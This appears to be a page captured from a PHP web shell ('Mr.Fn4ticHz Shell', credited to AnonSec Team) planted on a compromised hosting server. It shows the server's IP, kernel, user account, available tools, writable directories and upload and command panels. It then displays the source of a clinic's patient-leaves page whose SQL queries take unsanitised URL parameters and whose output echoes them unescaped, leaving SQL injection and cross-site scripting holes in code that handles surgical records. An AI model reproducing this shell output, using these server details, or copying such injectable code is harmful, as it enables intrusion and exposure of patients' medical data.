Mr.Fn4ticHz Shell
Server IP : 162.240.98.243  /  Your IP : 18.226.172.200
Web Server : Apache
System : Linux server.bti.yaw.mybluehostin.me 3.10.0-1160.119.1.el7.x86_64 #1 SMP Tue Jun 4 14:43:51 UTC 2024 x86_64
User : btiyawmy ( 1003)
PHP Version : 7.2.34
Disable Function : NONE
MySQL : OFF  |  cURL : ON  |  WGET : ON  |  Perl : ON  |  Python : ON  |  Sudo : ON  |  Pkexec : ON
Directory :  /home/btiyawmy/www/login.easenup.in/

Upload File :
current_dir [ Writeable ] document_root [ Writeable ]

 

Command :


[ HOME ]     

Current File : /home/btiyawmy/www/login.easenup.in//show_Patient_Leaves.php
     <?php
     session_start();
require_once('../DBManager.php');
require_once('../LoginManager.php');

    include("../dbconnection.php");
		$sql2 ="SELECT * FROM save_activity WHERE srno='$_GET[srno]'";
		$qsql2 = mysqli_query($con,$sql2);
		if($re1 = mysqli_fetch_array($qsql2))
		{
		    
		   
}
?>
	  

  <?php



?>



<h3 align='center'>Patient Leaves</h3>
<?php
include("dbconnection.php");

?>  
<div class="container">
    <div class="row">
        <div class="col-sm-6">
            
        </div>
        <div class="col-sm-6">
            <a href="edit_showpage_Patient_Leaves.php?prescriptionid=<?php echo $_GET['prescriptionid'] ?>&patientid=<?php echo $_GET['patientid'] ?>&surgeryid=<?php echo $_GET['surgeryid'] ?>" ><i class="fa fa-pencil-square-o" aria-hidden="true" style='font-size:20px;'></i>
</a>
        </div>
    </div>
</div>
  
<table id='example2' class='table table-bordered table-hover'>
<?php
  	$sql ="SELECT * FROM Patient_Leaves WHERE prescriptionid='$_GET[prescriptionid]' AND patientid='$_GET[patientid]' AND  surgeryid='$_GET[surgeryid]'";
		$qsql = mysqli_query($con,$sql);
		if($rs = mysqli_fetch_array($qsql))
		{
if($rs[Verbally_Confirmed] == 'on'){
    echo " <tr><td width='50%'>Surgical Assistant Verbally Confirmed With the Team: </td>
<td width='50%'><i class='fa fa-check' aria-hidden='true'></i></td></tr>";
} else{
    echo "<tr><td width='50%'>Surgical Assistant Verbally Confirmed With the Team: </td>
<td width='50%'><i class='fa fa-times' aria-hidden='true'></i></td></tr>";
}
if($rs[Procedure_Recorded] == 'on'){
    echo " <tr><td width='50%'>Name of the Procedure Recorded: </td>
<td width='50%'><i class='fa fa-check' aria-hidden='true'></i></td></tr>";
} else{
    echo "<tr><td width='50%'>Name of the Procedure Recorded: </td>
<td width='50%'><i class='fa fa-times' aria-hidden='true'></i></td></tr>";
}
if($rs[Specimen_Labeled] == 'on'){
    echo " <tr><td width='50%'>Specimen Labeled (Including Patient Name): </td>
<td width='50%'><i class='fa fa-check' aria-hidden='true'></i></td></tr>";
} else{
    echo "<tr><td width='50%'>Specimen Labeled (Including Patient Name): </td>
<td width='50%'><i class='fa fa-times' aria-hidden='true'></i></td></tr>";
}
if($rs[infection_present] == 'on'){
    echo " <tr><td width='50%'>Checked whether infection present in or around Surgery: </td>
<td width='50%'><i class='fa fa-check' aria-hidden='true'></i></td></tr>";
} else{
    echo "<tr><td width='50%'>Checked whether infection present in or around Surgery: </td>
<td width='50%'><i class='fa fa-times' aria-hidden='true'></i></td></tr>";
}
if($rs[Equipment_Problems] == 'on'){
    echo " <tr><td width='50%'>Any Equipment Problems to Be Addressed By Surgeon/Anesthetist ?: </td>
<td width='50%'><i class='fa fa-check' aria-hidden='true'></i></td></tr>";
} else{
    echo "<tr><td width='50%'>Any Equipment Problems to Be Addressed By Surgeon/Anesthetist ?: </td>
<td width='50%'><i class='fa fa-times' aria-hidden='true'></i></td></tr>";
}

echo"
<tr><td width='50%'>Details:</td><td width='50%'>$rs[Detail]</td></tr>
<tr><td width='50%'>Review The Key Concerns For Recovery And Management Of The Patient:</td><td width='50%'>$rs[Review_Key]</td></tr>
<tr><td width='50%'>Prognosis Explained to patient Attendant:</td><td width='50%'>$rs[Prognosis_Explained]</td></tr>

";
}
?>

</table>



Anon7 - 2022
AnonSec Team